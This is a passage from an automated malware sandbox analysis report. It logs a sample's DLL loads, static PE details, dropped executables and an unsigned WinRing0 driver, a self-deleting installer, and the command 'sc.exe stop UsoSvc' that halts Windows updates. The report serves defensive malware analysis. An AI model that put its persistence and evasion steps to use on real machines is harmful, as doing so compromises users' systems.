                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: wlanapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                        Source: C:\Windows\explorer.exeSection loaded: msi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winmm.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: secur32.dll
                        Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: mozglue.dll
                        Source: C:\Windows\explorer.exeSection loaded: wsock32.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\explorer.exeSection loaded: webio.dll
                        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                        Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
                        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\explorer.exeSection loaded: schannel.dll
                        Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                        Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: wlanapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                        Source: C:\Windows\explorer.exeSection loaded: msi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winmm.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: secur32.dll
                        Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: mozglue.dll
                        Source: C:\Windows\explorer.exeSection loaded: wsock32.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: wlanapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                        Source: C:\Windows\explorer.exeSection loaded: msi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winmm.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\explorer.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: secur32.dll
                        Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: mozglue.dll
                        Source: C:\Windows\explorer.exeSection loaded: wsock32.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: WindosCPUsystem.exe.4.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EB1A5 push ecx; ret 0_2_007EB1B8
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 8_2_00007FF60AA91394 push qword ptr [00007FF60AA9B004h]; ret 8_2_00007FF60AA91403
                        Source: C:\Windows\explorer.exeCode function: 33_2_013FD150 push rbp; retf 33_2_013FD151
                        Source: C:\Windows\explorer.exeCode function: 35_2_0281D150 push rbp; retf 35_2_0281D151
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A5D150 push rbp; retf 36_2_02A5D151

                        Persistence and Installation Behavior

                        barindex
                        Sample is not signed and drops a device driver
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sysJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sysJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeJump to dropped file
                        Source: C:\Windows\explorer.exeCode function: 33_2_01391000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,33_2_01391000
                        Source: C:\Windows\explorer.exeCode function: 33_2_013934B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,33_2_013934B0
                        Source: C:\Windows\explorer.exeCode function: 33_2_0139AF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,33_2_0139AF00
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,35_2_027B34B0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027BAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,35_2_027BAF00
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,36_2_029F34B0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,36_2_029FAF00
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Deletes itself after installation
                        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: C:\Users\user\Desktop\file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{DE7C4D5F-E773-43F0-B029-ED407FF538E8} {CE0CD485-D472-437F-80D7-DAF95EA046F4}Jump to behavior
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
